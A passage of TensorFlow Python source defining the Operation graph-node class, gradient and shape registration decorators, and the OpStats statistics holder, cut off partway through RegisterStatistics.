  An `Operation` is a node in a TensorFlow `Graph` that takes zero or
  more `Tensor` objects as input, and produces zero or more `Tensor`
  objects as output. Objects of type `Operation` are created by
  calling a Python op constructor (such as
  `tf.matmul`)
  or `tf.Graph.create_op`.
  For example `c = tf.matmul(a, b)` creates an `Operation` of type
  "MatMul" that takes tensors `a` and `b` as input, and produces `c`
  as output.
  After the graph has been launched in a session, an `Operation` can
  be executed by passing it to
  `tf.Session.run`.
  `op.run()` is a shortcut for calling
  `tf.compat.v1.get_default_session().run(op)`.
  """

  def __init__(self,
               node_def,
               g,
               inputs=None,
               output_types=None,
               control_inputs=None,
               input_types=None,
               original_op=None,
               op_def=None):
    r"""Creates an `Operation`.
    NOTE: This constructor validates the name of the `Operation` (passed
    as `node_def.name`). Valid `Operation` names match the following
    regular expression:
        [A-Za-z0-9.][A-Za-z0-9_.\\-/]*
    Args:
      node_def: `node_def_pb2.NodeDef`. `NodeDef` for the `Operation`. Used for
        attributes of `node_def_pb2.NodeDef`, typically `name`, `op`, and
        `device`. The `input` attribute is irrelevant here as it will be
        computed when generating the model.
      g: `Graph`. The parent graph.
      inputs: list of `Tensor` objects. The inputs to this `Operation`.
      output_types: list of `DType` objects. List of the types of the `Tensors`
        computed by this operation. The length of this list indicates the
        number of output endpoints of the `Operation`.
      control_inputs: list of operations or tensors from which to have a control
        dependency.
      input_types: List of `DType` objects representing the types of the tensors
        accepted by the `Operation`. By default uses `[x.dtype.base_dtype for x
        in inputs]`. Operations that expect reference-typed inputs must specify
        these explicitly.
      original_op: Optional. Used to associate the new `Operation` with an
        existing `Operation` (for example, a replica with the op that was
        replicated).
      op_def: Optional. The `op_def_pb2.OpDef` proto that describes the op type
        that this `Operation` represents.
    Raises:
      TypeError: if control inputs are not Operations or Tensors,
        or if `node_def` is not a `NodeDef`,
        or if `g` is not a `Graph`,
        or if `inputs` are not tensors,
        or if `inputs` and `input_types` are incompatible.
      ValueError: if the `node_def` name is not valid.
    """
    # For internal use only: `node_def` can be set to a TF_Operation to create
    # an Operation for that op. This is useful for creating Operations for ops
    # indirectly created by C API methods, e.g. the ops created by
    # TF_ImportGraphDef. When `node_def` is a TF_Operation, all optional fields
    # should be None.
    if isinstance(node_def, node_def_pb2.NodeDef):
      # Protos above 2GB cannot be serialized (31-bit size limit); a negative
      # ByteSize() indicates overflow of that limit.
      if node_def.ByteSize() >= (1 << 31) or node_def.ByteSize() < 0:
        raise ValueError(
            "Cannot create a tensor proto whose content is larger than 2GB.")
      if not _VALID_OP_NAME_REGEX.match(node_def.name):
        raise ValueError("'%s' is not a valid node name" % node_def.name)
      c_op = None
    elif type(node_def).__name__ == "SwigPyObject":
      # `node_def` is already a wrapped TF_Operation (internal-use path above):
      # all the optional construction arguments must be unset.
      assert inputs is None
      assert output_types is None
      assert control_inputs is None
      assert input_types is None
      assert original_op is None
      assert op_def is None
      c_op = node_def
    else:
      raise TypeError("node_def needs to be a NodeDef: %s" % node_def)
    if not isinstance(g, Graph):
      raise TypeError("g needs to be a Graph: %s" % g)
    self._graph = g
    if inputs is None:
      inputs = []
    elif not isinstance(inputs, list):
      raise TypeError("inputs needs to be a list of Tensors: %s" % inputs)
    for a in inputs:
      if not isinstance(a, Tensor):
        raise TypeError("input needs to be a Tensor: %s" % a)
    if input_types is None:
      input_types = [i.dtype.base_dtype for i in inputs]
    else:
      if not all(
          x.is_compatible_with(i.dtype) for i, x in zip(inputs, input_types)):
        raise TypeError("In op '%s', input types (%s) are not compatible "
                        "with expected types (%s)" %
                        (node_def.name, [i.dtype for i in inputs], input_types))
    # Build the list of control inputs.
    control_input_ops = []
    if control_inputs:
      for c in control_inputs:
        control_op = None
        if isinstance(c, Operation):
          control_op = c
        elif isinstance(c, (Tensor, IndexedSlices)):
          # Tensors and IndexedSlices contribute their producing op as the
          # control dependency.
          control_op = c.op
        else:
          raise TypeError("Control input must be an Operation, "
                          "a Tensor, or IndexedSlices: %s" % c)
        control_input_ops.append(control_op)
    # This will be set by self.inputs.
    self._inputs_val = None
    # pylint: disable=protected-access
    self._id_value = self._graph._next_id()
    self._original_op = original_op
    self._traceback = tf_stack.extract_stack()
    # List of _UserDevSpecs holding code location of device context manager
    # invocations and the users original argument to them.
    self._device_code_locations = None
    # Dict mapping op name to file and line information for op colocation
    # context managers.
    self._colocation_code_locations = None
    self._control_flow_context = self.graph._get_control_flow_context()
    # Initialize self._c_op.
    if c_op:
      # Pre-existing C op: recover its OpDef and name from the C API.
      self._c_op = c_op
      op_def = g._get_op_def(c_api.TF_OperationOpType(c_op))
      name = self.name
    else:
      if op_def is None:
        op_def = self._graph._get_op_def(node_def.op)
      # TODO(skyewm): op_def_library.apply_op() flattens the incoming inputs.
      # Refactor so we don't have to do this here.
      grouped_inputs = self._reconstruct_sequence_inputs(
          op_def, inputs, node_def.attr)
      self._c_op = _create_c_op(self._graph, node_def, grouped_inputs,
                                control_input_ops)
      name = compat.as_str(node_def.name)
    # pylint: enable=protected-access
    # Record whether the op is stateful, per its OpDef.
    self._is_stateful = op_def.is_stateful
    # Initialize self._outputs.
    num_outputs = c_api.TF_OperationNumOutputs(self._c_op)
    self._outputs = []
    for i in range(num_outputs):
      tf_output = c_api_util.tf_output(self._c_op, i)
      output_type = c_api.TF_OperationOutputType(tf_output)
      tensor = Tensor._create_with_tf_output(self, i, output_type, tf_output)  # pylint: disable=protected-access
      self._outputs.append(tensor)
    self._graph._add_op(self, self._id_value, name)  # pylint: disable=protected-access
    if not c_op:
      self._control_flow_post_processing()

  def _control_flow_post_processing(self):
    """Add this op to its control flow context.
    This may add new ops and change this op's inputs. self.inputs must be
    available before calling this method.
    """
    for input_tensor in self.inputs:
      control_flow_util.CheckInputFromValidContext(self, input_tensor.op)
    if self._control_flow_context is not None:
      self._control_flow_context.AddOp(self)

  def _reconstruct_sequence_inputs(self, op_def, inputs, attrs):
    """Regroups a flat list of input tensors into scalar and sequence inputs.
    Args:
      op_def: The `op_def_pb2.OpDef` (for knowing the input types)
      inputs: a list of input `Tensor`s to the op.
      attrs: mapping from attr name to `attr_value_pb2.AttrValue` (these define
        how long each sequence is)
    Returns:
      A list of `Tensor`s (corresponding to scalar inputs) and lists of
      `Tensor`s (corresponding to sequence inputs).
    """
    grouped_inputs = []
    i = 0
    for input_arg in op_def.input_arg:
      # number_attr / type_list_attr mark sequence-valued inputs; their
      # lengths are read from the corresponding attrs.
      if input_arg.number_attr:
        input_len = attrs[input_arg.number_attr].i
        is_sequence = True
      elif input_arg.type_list_attr:
        input_len = len(attrs[input_arg.type_list_attr].list.type)
        is_sequence = True
      else:
        input_len = 1
        is_sequence = False
      if is_sequence:
        grouped_inputs.append(inputs[i:i + input_len])
      else:
        grouped_inputs.append(inputs[i])
      i += input_len
    # All flattened inputs must be consumed exactly.
    assert i == len(inputs)
    return grouped_inputs

  def colocation_groups(self):
    """Returns the list of colocation groups of the op."""
    default_colocation_group = [compat.as_bytes("loc:@%s" % self.name)]
    try:
      class_attr = self.get_attr("_class")
    except ValueError:
      # This op has no explicit colocation group, so it is itself its
      # own root of a colocation group.
      return default_colocation_group
    attr_groups = [
        class_name for class_name in class_attr
        if class_name.startswith(b"loc:@")
    ]
    # If there are no colocation groups in the explicit _class field,
    # return the default colocation group.
    return attr_groups if attr_groups else default_colocation_group

  def values(self):
    """DEPRECATED: Use outputs."""
    return tuple(self.outputs)

  def _get_control_flow_context(self):
    """Returns the control flow context of this op.
    Returns:
      A context object.
    """
    return self._control_flow_context

  def _set_control_flow_context(self, ctx):
    """Sets the current control flow context of this op.
    Args:
      ctx: a context object.
    """
    self._control_flow_context = ctx

  @property
  def name(self):
    """The full name of this operation."""
    return c_api.TF_OperationName(self._c_op)

  @property
  def _id(self):
    """The unique integer id of this operation."""
    return self._id_value

  @property
  def device(self):
    """The name of the device to which this op has been assigned, if any.
    Returns:
      The string name of the device to which this op has been
      assigned, or an empty string if it has not been assigned to a
      device.
    """
    return c_api.TF_OperationDevice(self._c_op)

  @property
  def _device_assignments(self):
    """Code locations for device context managers active at op creation.
    This property will return a list of traceable_stack.TraceableObject
    instances where .obj is a string representing the assigned device
    (or information about the function that would be applied to this op
    to compute the desired device) and the filename and lineno members
    record the location of the relevant device context manager.
    For example, suppose file_a contained these lines:
      file_a.py:
        15: with tf.device('/gpu:0'):
        16:   node_b = tf.constant(4, name='NODE_B')
    Then a TraceableObject t_obj representing the device context manager
    would have these member values:
      t_obj.obj -> '/gpu:0'
      t_obj.filename = 'file_a.py'
      t_obj.lineno = 15
    and node_b.op._device_assignments would return the list [t_obj].
    Returns:
      [str: traceable_stack.TraceableObject, ...] as per this method's
      description, above.
    """
    return self._device_code_locations or []

  @property
  def _colocation_dict(self):
    """Code locations for colocation context managers active at op creation.
    This property will return a dictionary for which the keys are nodes with
    which this Operation is colocated, and for which the values are
    traceable_stack.TraceableObject instances. The TraceableObject instances
    record the location of the relevant colocation context manager but have the
    "obj" field set to None to prevent leaking private data.
    For example, suppose file_a contained these lines:
      file_a.py:
        14: node_a = tf.constant(3, name='NODE_A')
        15: with tf.compat.v1.colocate_with(node_a):
        16:   node_b = tf.constant(4, name='NODE_B')
    Then a TraceableObject t_obj representing the colocation context manager
    would have these member values:
      t_obj.obj -> None
      t_obj.filename = 'file_a.py'
      t_obj.lineno = 15
    and node_b.op._colocation_dict would return the dictionary
      { 'NODE_A': t_obj }
    Returns:
      {str: traceable_stack.TraceableObject} as per this method's description,
      above.
    """
    locations_dict = self._colocation_code_locations or {}
    # Return a copy so callers cannot mutate the op's internal dict.
    return locations_dict.copy()

  @property
  def _output_types(self):
    """List this operation's output types.
    Returns:
      List of the types of the Tensors computed by this operation.
      Each element in the list is an integer whose value is one of
      the TF_DataType enums defined in c_api.h
      The length of this list indicates the number of output endpoints
      of the operation.
    """
    num_outputs = c_api.TF_OperationNumOutputs(self._c_op)
    # NOTE(review): `xrange` presumably comes from six.moves (py2/3 compat
    # import at file top) — confirm.
    output_types = [
        c_api.TF_OperationOutputType(self._tf_output(i))
        for i in xrange(num_outputs)
    ]
    # In all the tests we have output_types that are passed into
    # Operation.__init__ are a list of ints (which is illegal according
    # to the docstring), but input_types are instances of DType.
    # This extra assert is to catch if we ever use DType for output_types.
    if output_types:
      assert isinstance(output_types[0], int)
    return output_types

  def _tf_output(self, output_idx):
    """Create and return a new TF_Output for output_idx'th output of this op."""
    tf_output = c_api.TF_Output()
    tf_output.oper = self._c_op
    tf_output.index = output_idx
    return tf_output

  def _tf_input(self, input_idx):
    """Create and return a new TF_Input for input_idx'th input of this op."""
    tf_input = c_api.TF_Input()
    tf_input.oper = self._c_op
    tf_input.index = input_idx
    return tf_input

  def _set_device(self, device):  # pylint: disable=redefined-outer-name
    """Set the device of this operation.
    Args:
      device: string or device.. The device to set.
    """
    self._set_device_from_string(compat.as_str(_device_string(device)))

  def _set_device_from_string(self, device_str):
    """Fast path to set device if the type is known to be a string.
    This function is called frequently enough during graph construction that
    there are non-trivial performance gains if the caller can guarantee that
    the specified device is already a string.
    Args:
      device_str: A string specifying where to place this op.
    """
    c_api.SetRequestedDevice(
        self._graph._c_graph,  # pylint: disable=protected-access
        self._c_op,  # pylint: disable=protected-access
        device_str)

  def _update_input(self, index, tensor):
    """Update the input to this operation at the given index.
    NOTE: This is for TF internal use only. Please don't use it.
    Args:
      index: the index of the input to update.
      tensor: the Tensor to be used as the input at the given index.
    Raises:
      TypeError: if tensor is not a Tensor,
        or if input tensor type is not convertible to dtype.
      ValueError: if the Tensor is from a different graph.
    """
    if not isinstance(tensor, Tensor):
      raise TypeError("tensor must be a Tensor: %s" % tensor)
    _assert_same_graph(self, tensor)
    # Reset cached inputs.
    self._inputs_val = None
    c_api.UpdateEdge(
        self._graph._c_graph,  # pylint: disable=protected-access
        tensor._as_tf_output(),  # pylint: disable=protected-access
        self._tf_input(index))

  def _add_while_inputs(self, tensors):
    """See AddWhileInputHack in python_api.h.
    NOTE: This is for TF internal use only. Please don't use it.
    Args:
      tensors: list of Tensors
    Raises:
      TypeError: if tensor is not a Tensor,
        or if input tensor type is not convertible to dtype.
      ValueError: if the Tensor is from a different graph.
    """
    for tensor in tensors:
      if not isinstance(tensor, Tensor):
        raise TypeError("tensor must be a Tensor: %s" % tensor)
      _assert_same_graph(self, tensor)
      # Reset cached inputs.
      self._inputs_val = None
      c_api.AddWhileInputHack(
          self._graph._c_graph,  # pylint: disable=protected-access
          tensor._as_tf_output(),  # pylint: disable=protected-access
          self._c_op)

  def _add_control_inputs(self, ops):
    """Add a list of new control inputs to this operation.
    Args:
      ops: the list of Operations to add as control input.
    Raises:
      TypeError: if ops is not a list of Operations.
      ValueError: if any op in ops is from a different graph.
    """
    for op in ops:
      if not isinstance(op, Operation):
        raise TypeError("op must be an Operation: %s" % op)
      c_api.AddControlInput(self._graph._c_graph, self._c_op, op._c_op)  # pylint: disable=protected-access

  def _add_control_input(self, op):
    """Add a new control input to this operation.
    Args:
      op: the Operation to add as control input.
    Raises:
      TypeError: if op is not an Operation.
      ValueError: if op is from a different graph.
    """
    if not isinstance(op, Operation):
      raise TypeError("op must be an Operation: %s" % op)
    c_api.AddControlInput(self._graph._c_graph, self._c_op, op._c_op)  # pylint: disable=protected-access

  def _remove_all_control_inputs(self):
    """Removes any control inputs to this operation."""
    c_api.RemoveAllControlInputs(self._graph._c_graph, self._c_op)  # pylint: disable=protected-access

  def _add_outputs(self, types, shapes):
    """Adds new Tensors to self.outputs.
    Note: this is generally unsafe to use. This is used in certain situations in
    conjunction with _set_type_list_attr.
    Arguments:
      types: list of DTypes
      shapes: list of TensorShapes
    """
    assert len(types) == len(shapes)
    orig_num_outputs = len(self.outputs)
    # New outputs are appended after the existing ones; their indices
    # continue from orig_num_outputs.
    for i in range(len(types)):
      t = Tensor(self, orig_num_outputs + i, types[i])
      self._outputs.append(t)
      t.set_shape(shapes[i])

  def __str__(self):
    return str(self.node_def)

  def __repr__(self):
    return "<tf.Operation '%s' type=%s>" % (self.name, self.type)

  @property
  def outputs(self):
    """The list of `Tensor` objects representing the outputs of this op."""
    return self._outputs

  class _InputList(object):
    """Immutable input list wrapper."""

    def __init__(self, inputs):
      self._inputs = inputs

    def __iter__(self):
      return iter(self._inputs)

    def __len__(self):
      return len(self._inputs)

    def __bool__(self):
      return bool(self._inputs)

    # Python 3 wants __bool__, Python 2.7 wants __nonzero__
    __nonzero__ = __bool__

    def __getitem__(self, i):
      return self._inputs[i]

  @property
  def inputs(self):
    """The list of `Tensor` objects representing the data inputs of this op."""
    if self._inputs_val is None:
      tf_outputs = c_api.GetOperationInputs(self._c_op)
      # pylint: disable=protected-access
      retval = [
          self.graph._get_tensor_by_tf_output(tf_output)
          for tf_output in tf_outputs
      ]
      # pylint: enable=protected-access
      self._inputs_val = Operation._InputList(retval)
    return self._inputs_val

  @property
  def _inputs(self):
    logging.warning("Operation._inputs is private, use Operation.inputs "
                    "instead. Operation._inputs will eventually be removed.")
    return self.inputs

  @_inputs.setter
  def _inputs(self, value):
    raise ValueError("Cannot assign _inputs")

  @property
  def _input_types(self):
    num_inputs = c_api.TF_OperationNumInputs(self._c_op)
    input_types = [
        dtypes.as_dtype(c_api.TF_OperationInputType(self._tf_input(i)))
        for i in xrange(num_inputs)
    ]
    return input_types

  @_input_types.setter
  def _input_types(self, value):
    raise ValueError("Cannot assign _input_types")

  @property
  def control_inputs(self):
    """The `Operation` objects on which this op has a control dependency.
    Before this op is executed, TensorFlow will ensure that the
    operations in `self.control_inputs` have finished executing. This
    mechanism can be used to run ops sequentially for performance
    reasons, or to ensure that the side effects of an op are observed
    in the correct order.
    Returns:
      A list of `Operation` objects.
    """
    control_c_ops = c_api.TF_OperationGetControlInputs_wrapper(self._c_op)
    # pylint: disable=protected-access
    return [
        self.graph._get_operation_by_name_unsafe(c_api.TF_OperationName(c_op))
        for c_op in control_c_ops
    ]
    # pylint: enable=protected-access

  @property
  def _control_outputs(self):
    """The `Operation` objects which have a control dependency on this op.
    Before any of the ops in self._control_outputs can execute tensorflow will
    ensure self has finished executing.
    Returns:
      A list of `Operation` objects.
    """
    control_c_ops = c_api.TF_OperationGetControlOutputs_wrapper(self._c_op)
    # pylint: disable=protected-access
    return [
        self.graph._get_operation_by_name_unsafe(c_api.TF_OperationName(c_op))
        for c_op in control_c_ops
    ]
    # pylint: enable=protected-access

  @property
  def _control_inputs(self):
    logging.warning("Operation._control_inputs is private, use "
                    "Operation.control_inputs instead. "
                    "Operation._control_inputs will eventually be removed.")
    return self.control_inputs

  @_control_inputs.setter
  def _control_inputs(self, value):
    logging.warning("Operation._control_inputs is private, use "
                    "Operation.control_inputs instead. "
                    "Operation._control_inputs will eventually be removed.")
    # Copy value because it may be self._control_inputs_val (in particular if
    # this is called from self._control_inputs += ...), and we don't want to
    # clear value below.
    value = copy.copy(value)
    self._remove_all_control_inputs()
    self._add_control_inputs(value)

  @property
  def type(self):
    """The type of the op (e.g. `"MatMul"`)."""
    return c_api.TF_OperationOpType(self._c_op)

  @property
  def graph(self):
    """The `Graph` that contains this operation."""
    return self._graph

  @property
  def node_def(self):
    # pylint: disable=line-too-long
    """Returns the `NodeDef` representation of this operation.
    Returns:
      A
      [`NodeDef`](https://www.tensorflow.org/code/tensorflow/core/framework/node_def.proto)
      protocol buffer.
    """
    # pylint: enable=line-too-long
    with c_api_util.tf_buffer() as buf:
      c_api.TF_OperationToNodeDef(self._c_op, buf)
      data = c_api.TF_GetBuffer(buf)
    node_def = node_def_pb2.NodeDef()
    node_def.ParseFromString(compat.as_bytes(data))
    return node_def

  @property
  def _node_def(self):
    logging.warning("Operation._node_def is private, use Operation.node_def "
                    "instead. Operation._node_def will eventually be removed.")
    return self.node_def

  @property
  def op_def(self):
    # pylint: disable=line-too-long
    """Returns the `OpDef` proto that represents the type of this op.
    Returns:
      An
      [`OpDef`](https://www.tensorflow.org/code/tensorflow/core/framework/op_def.proto)
      protocol buffer.
    """
    # pylint: enable=line-too-long
    return self._graph._get_op_def(self.type)

  @property
  def _op_def(self):
    logging.warning("Operation._op_def is private, use Operation.op_def "
                    "instead. Operation._op_def will eventually be removed.")
    return self.op_def

  @property
  def traceback(self):
    """Returns the call stack from when this operation was constructed."""
    return self._traceback

  def _set_attr(self, attr_name, attr_value):
    """Private method used to set an attribute in the node_def."""
    buf = c_api.TF_NewBufferFromString(
        compat.as_bytes(attr_value.SerializeToString()))
    try:
      # pylint: disable=protected-access
      c_api.SetAttr(self._graph._c_graph, self._c_op, attr_name, buf)
      # pylint: enable=protected-access
    finally:
      # Always release the C buffer, even if SetAttr raised.
      c_api.TF_DeleteBuffer(buf)

  def _set_func_attr(self, attr_name, func_name):
    """Private method used to set a function attribute in the node_def."""
    func = attr_value_pb2.NameAttrList(name=func_name)
    self._set_attr(attr_name, attr_value_pb2.AttrValue(func=func))

  def _set_func_list_attr(self, attr_name, func_names):
    """Private method used to set a list(function) attribute in the node_def."""
    funcs = [attr_value_pb2.NameAttrList(name=func_name)
             for func_name in func_names]
    funcs_list = attr_value_pb2.AttrValue.ListValue(func=funcs)
    self._set_attr(attr_name, attr_value_pb2.AttrValue(list=funcs_list))

  def _set_type_list_attr(self, attr_name, types):
    """Private method used to set a list(type) attribute in the node_def."""
    if not types:
      return
    if isinstance(types[0], dtypes.DType):
      types = [dt.as_datatype_enum for dt in types]
    types_list = attr_value_pb2.AttrValue.ListValue(type=types)
    self._set_attr(attr_name, attr_value_pb2.AttrValue(list=types_list))

  def _set_shape_list_attr(self, attr_name, shapes):
    """Private method used to set a list(shape) attribute in the node_def."""
    shapes = [s.as_proto() for s in shapes]
    shapes_list = attr_value_pb2.AttrValue.ListValue(shape=shapes)
    self._set_attr(attr_name, attr_value_pb2.AttrValue(list=shapes_list))

  def _clear_attr(self, attr_name):
    """Private method used to clear an attribute in the node_def."""
    # pylint: disable=protected-access
    c_api.ClearAttr(self._graph._c_graph, self._c_op, attr_name)
    # pylint: enable=protected-access

  def get_attr(self, name):
    """Returns the value of the attr of this op with the given `name`.
    Args:
      name: The name of the attr to fetch.
    Returns:
      The value of the attr, as a Python object.
    Raises:
      ValueError: If this op does not have an attr with the given `name`.
    """
    fields = ("s", "i", "f", "b", "type", "shape", "tensor", "func")
    try:
      with c_api_util.tf_buffer() as buf:
        c_api.TF_OperationGetAttrValueProto(self._c_op, name, buf)
        data = c_api.TF_GetBuffer(buf)
    except errors.InvalidArgumentError as e:
      # Convert to ValueError for backwards compatibility.
      raise ValueError(str(e))
    x = attr_value_pb2.AttrValue()
    x.ParseFromString(data)
    oneof_value = x.WhichOneof("value")
    if oneof_value is None:
      return []
    if oneof_value == "list":
      # Return the first populated list field; "type" entries are converted
      # to DType objects.
      for f in fields:
        if getattr(x.list, f):
          if f == "type":
            return [dtypes.as_dtype(t) for t in x.list.type]
          else:
            return list(getattr(x.list, f))
      return []
    if oneof_value == "type":
      return dtypes.as_dtype(x.type)
    assert oneof_value in fields, "Unsupported field type in " + str(x)
    return getattr(x, oneof_value)

  def _get_attr_type(self, name):
    """Returns the `DType` value of the attr of this op with the given `name`."""
    try:
      dtype_enum = c_api.TF_OperationGetAttrType(self._c_op, name)
      return _DTYPES_INTERN_TABLE[dtype_enum]
    except errors.InvalidArgumentError as e:
      # Convert to ValueError for backwards compatibility.
      raise ValueError(str(e))

  def _get_attr_bool(self, name):
    """Returns the `bool` value of the attr of this op with the given `name`."""
    try:
      return c_api.TF_OperationGetAttrBool(self._c_op, name)
    except errors.InvalidArgumentError as e:
      # Convert to ValueError for backwards compatibility.
      raise ValueError(str(e))

  def _get_attr_int(self, name):
    """Returns the `int` value of the attr of this op with the given `name`."""
    try:
      return c_api.TF_OperationGetAttrInt(self._c_op, name)
    except errors.InvalidArgumentError as e:
      # Convert to ValueError for backwards compatibility.
      raise ValueError(str(e))

  def run(self, feed_dict=None, session=None):
    """Runs this operation in a `Session`.
    Calling this method will execute all preceding operations that
    produce the inputs needed for this operation.
    *N.B.* Before invoking `Operation.run()`, its graph must have been
    launched in a session, and either a default session must be
    available, or `session` must be specified explicitly.
    Args:
      feed_dict: A dictionary that maps `Tensor` objects to feed values. See
        `tf.Session.run` for a description of the valid feed values.
      session: (Optional.) The `Session` to be used to run to this operation. If
        none, the default session will be used.
    """
    _run_using_default_session(self, feed_dict, self.graph, session)
# Registry of gradient functions, keyed by op type string; populated via
# RegisterGradient / no_gradient and consulted by get_gradient_function.
_gradient_registry = registry.Registry("gradient")
@tf_export("RegisterGradient")
class RegisterGradient(object):
  """A decorator for registering the gradient function for an op type.

  This decorator is only used when defining a new op type. For an op
  with `m` inputs and `n` outputs, the gradient function is a function
  that takes the original `Operation` and `n` `Tensor` objects
  (representing the gradients with respect to each output of the op),
  and returns `m` `Tensor` objects (representing the partial gradients
  with respect to each input of the op).

  For example, assuming that operations of type `"Sub"` take two
  inputs `x` and `y`, and return a single output `x - y`, the
  following gradient function would be registered:

  ```python
  @tf.RegisterGradient("Sub")
  def _sub_grad(unused_op, grad):
    return grad, tf.negative(grad)
  ```

  The decorator argument `op_type` is the string type of an
  operation. This corresponds to the `OpDef.name` field for the proto
  that defines the operation.
  """

  def __init__(self, op_type):
    """Creates a new decorator with `op_type` as the Operation type.

    Args:
      op_type: The string type of an operation. This corresponds to the
        `OpDef.name` field for the proto that defines the operation.

    Raises:
      TypeError: If `op_type` is not string.
    """
    if isinstance(op_type, six.string_types):
      self._op_type = op_type
    else:
      raise TypeError("op_type must be a string")

  def __call__(self, f):
    """Registers the function `f` as gradient function for `op_type`."""
    _gradient_registry.register(f, self._op_type)
    return f
@deprecation.deprecated_endpoints("NotDifferentiable", "NoGradient")
@tf_export("no_gradient", v1=["no_gradient", "NotDifferentiable", "NoGradient"])
def no_gradient(op_type):
  """Specifies that ops of type `op_type` is not differentiable.

  This function should *not* be used for operations that have a
  well-defined gradient that is not yet implemented.

  This function is only used when defining a new op type. It may be
  used for ops such as `tf.size()` that are not differentiable. For
  example:

  ```python
  tf.no_gradient("Size")
  ```

  The gradient computed for 'op_type' will then propagate zeros.

  For ops that have a well-defined gradient but are not yet implemented,
  no declaration should be made, and an error *must* be thrown if
  an attempt to request its gradient is made.

  Args:
    op_type: The string type of an operation. This corresponds to the
      `OpDef.name` field for the proto that defines the operation.

  Raises:
    TypeError: If `op_type` is not a string.
  """
  # Registering None marks the op type as deliberately non-differentiable.
  if isinstance(op_type, six.string_types):
    _gradient_registry.register(None, op_type)
  else:
    raise TypeError("op_type must be a string")
# Aliases for the old names, will be eventually removed.
# Both point at `no_gradient` and are exported as deprecated v1 endpoints
# ("NotDifferentiable", "NoGradient").
NoGradient = no_gradient
NotDifferentiable = no_gradient
def get_gradient_function(op):
  """Returns the function that computes gradients for "op"."""
  # Ops without data inputs have nothing to differentiate with respect to.
  if not op.inputs:
    return None
  # An op may redirect gradient dispatch via the "_gradient_op_type" attr;
  # when that attr is absent, fall back to the op's own type string.
  try:
    lookup_key = op.get_attr("_gradient_op_type")
  except ValueError:
    lookup_key = op.type
  return _gradient_registry.lookup(lookup_key)
# Registries of shape functions keyed by op type; explicit registrations go
# into _shape_registry, weak defaults into _default_shape_function_registry
# (see RegisterShape below).
_shape_registry = registry.Registry("shape functions")
_default_shape_function_registry = registry.Registry("default shape functions")
# These are set to common_shapes.call_cpp_shape_fn by op generated code
# (generated by python_op_gen.cc).
# It is set outside ops.py to avoid a circular dependency.
_call_cpp_shape_fn = None
_call_cpp_shape_fn_and_require_op = None
def _set_call_cpp_shape_fn(call_cpp_shape_fn):
  """Sets default shape fns from passed common_shapes.call_cpp_shape_fn."""
  global _call_cpp_shape_fn, _call_cpp_shape_fn_and_require_op
  if _call_cpp_shape_fn:
    # A previous call already installed the shape functions; keep them.
    return

  def _shape_fn_without_requiring(op):
    return call_cpp_shape_fn(op, require_shape_fn=False)

  def _shape_fn_with_requiring(op):
    return call_cpp_shape_fn(op, require_shape_fn=True)

  _call_cpp_shape_fn = _shape_fn_without_requiring
  _call_cpp_shape_fn_and_require_op = _shape_fn_with_requiring
class RegisterShape(object):
  """No longer used.

  Was: A decorator for registering a shape function.

  Shape functions must now be registered via the SetShapeFn on the
  original Op specification in C++.
  """

  def __init__(self, op_type):
    """Saves the `op_type` as the `Operation` type."""
    if not isinstance(op_type, six.string_types):
      raise TypeError("op_type must be a string")
    self._op_type = op_type

  def __call__(self, f):
    """Registers "f" as the shape function for "op_type"."""
    if f is not None:
      # A real shape function overrides any weak default registration.
      _shape_registry.register(f, self._op_type)
      return f
    # None is a special "weak" value that provides a default shape function,
    # and can be overridden by a non-None registration.
    assert _call_cpp_shape_fn
    try:
      _default_shape_function_registry.register(_call_cpp_shape_fn,
                                                self._op_type)
    except KeyError:
      # Ignore duplicate registrations of the weak value. This can
      # occur if the op library input to wrapper generation
      # inadvertently links in one or more of the standard op
      # libraries.
      pass
    return f
def set_shape_and_handle_data_for_outputs(_):
  """No op. TODO(b/74620627): Remove this."""
  # Intentionally does nothing; kept only for callers that still invoke it.
  return None
class OpStats(object):
  """A holder for statistics about an operator.

  This class holds information about the resource requirements for an op,
  including the size of its weight parameters on-disk and how many FLOPS it
  requires to execute forward inference.

  If you define a new operation, you can create a function that will return a
  set of information about its usage of the CPU and disk space when serialized.
  The function itself takes a Graph object that's been set up so you can call
  methods like get_tensor_by_name to help calculate the results, and a NodeDef
  argument.
  """

  def __init__(self, statistic_type, value=None):
    """Sets up the initial placeholders for the statistics.

    Args:
      statistic_type: string identifying the kind of statistic (e.g. "flops").
      value: optional numeric amount; None means "not yet known".
    """
    self.statistic_type = statistic_type
    self.value = value

  @property
  def statistic_type(self):
    return self._statistic_type

  @statistic_type.setter
  def statistic_type(self, statistic_type):
    self._statistic_type = statistic_type

  @property
  def value(self):
    return self._value

  @value.setter
  def value(self, value):
    self._value = value

  def __iadd__(self, other):
    """Accumulates another `OpStats` of the same `statistic_type` into this one.

    Args:
      other: the `OpStats` being added to this one.

    Returns:
      This `OpStats`, with `other.value` folded into `self.value`.

    Raises:
      ValueError: if the two stats have different `statistic_type`s.
    """
    if other.statistic_type != self.statistic_type:
      # Bug fix: the message reads "add an OpStat of type X to one of Y",
      # so the added stat's type (`other`) must be interpolated first.
      # Previously the arguments were swapped.
      raise ValueError("Can't add an OpStat of type %s to one of %s." %
                       (other.statistic_type, self.statistic_type))
    if self.value is None:
      self.value = other.value
    elif other.value is not None:
      # Both sides have values; accumulate in place.
      self._value += other.value
    return self
# Registry of statistics functions, keyed by "op_type,statistic_type"
# strings (see RegisterStatistics below).
_stats_registry = registry.Registry("statistical functions")
class RegisterStatistics(object):
  """A decorator for registering the statistics function for an op type.

  This decorator can be defined for an op type so that it gives a
  report on the resources used by an instance of an operator, in the
  form of an OpStats object.

  Well-known types of statistics include these so far:

  - flops: When running a graph, the bulk of the computation happens doing
    numerical calculations like matrix multiplications. This type allows a node
    to return how many floating-point operations it takes to complete. The
    total number of FLOPs for a graph is a good guide to its expected latency.

  You can add your own statistics just by picking a new type string, registering
  functions for the ops you care about, and then calling get_stats_for_node_def.

  If a statistic for an op is registered multiple times, a KeyError will be
  raised.

  Since the statistics is counted on a per-op basis. It is not suitable for
  model parameters (capacity), which is expected to be counted only once, even
  if it is shared by multiple ops. (e.g. RNN)

  For example, you can define a new metric called doohickey for a Foo operation
  by placing this in your code:

  ```python
  @ops.RegisterStatistics("Foo", "doohickey")
  def _calc_foo_bojangles(unused_graph, unused_node_def):
    return ops.OpStats("doohickey", 20)
  ```

  Then in client code you can retrieve the value by making this call:

  ```python
  doohickey = ops.get_stats_for_node_def(graph, node_def, "doohickey")
  ```

  If the NodeDef is for an op with a registered doohickey function, you'll get
  back the calculated amount in doohickey.value, or None if it's not defined.
  """

  def __init__(self, op_type, statistic_type):
